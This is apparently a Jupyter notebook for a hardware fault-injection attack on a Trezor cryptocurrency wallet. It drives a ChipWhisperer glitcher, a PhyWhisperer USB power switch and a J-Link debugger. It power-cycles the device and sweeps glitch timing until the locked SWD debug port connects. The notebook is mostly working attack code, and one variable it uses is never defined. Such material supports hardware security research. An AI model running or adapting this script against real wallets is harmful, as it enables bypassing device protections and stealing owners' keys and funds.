In [ ]:
import sys
import time
from datetime import datetime
import logging
import os
import subprocess
import getopt
from collections import namedtuple
import numpy as np
import chipwhisperer as cw
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import trange
from importlib import reload
import struct

Range = namedtuple("Range", ["min", "max", "step"])

In [ ]:
scope = cw.scope()
scope.default_setup()

print("ChipWhisperer SN:", scope.sn)

In [ ]:
import pylink
jlink = pylink.JLink()

jlink.open()
jlink.set_tif(pylink.enums.JLinkInterfaces.SWD)

print(jlink.product_name)

In [ ]:
# PhyWhisperer-USB configuration (used for USB power control of Trezor)
import phywhisperer.usb as pw
phy = pw.Usb()
phy.con()

phy.set_usb_mode("auto")
phy.set_power_source("off")
time.sleep(0.5)
phy.set_power_source("5V")

In [ ]:
def reboot_flush_phase1():
    phy.set_power_source("off")
    time.sleep(0.2)
    scope.arm()
    phy.set_power_source("5V")
    scope.io.nrst = "low"
    time.sleep(0.1)
    scope.io.nrst = "high_z"

In [ ]:

print(datetime.now())

repeat_range = Range(12 * freq_multiplier, 14 * freq_multiplier, 1)
offset_range = Range(3600 * freq_multiplier, 4800 * freq_multiplier, 1)

scope.glitch.repeat = repeat_range.min

done = False
while done == False:
    scope.glitch.ext_offset = offset_range.min
    if scope.glitch.repeat >= repeat_range.max:
        scope.glitch.repeat = repeat_range.min
    while scope.glitch.ext_offset <= offset_range.max:
        reboot_flush_phase1()

        r = None
        try:
            r = jlink.connect('target')

        except Exception as message:
            message = str(message)
            if "Unspecified error" not in message:
                print(message)
            pass

        else:
            print(datetime.now())
            os.system('say "Hack the planet"')
            done = True
            break
           
        scope.glitch.ext_offset += offset_range.step

    scope.glitch.repeat += repeat_range.step

In [ ]:
# Clean up
scope.dis()
phy.close()
print("Done!")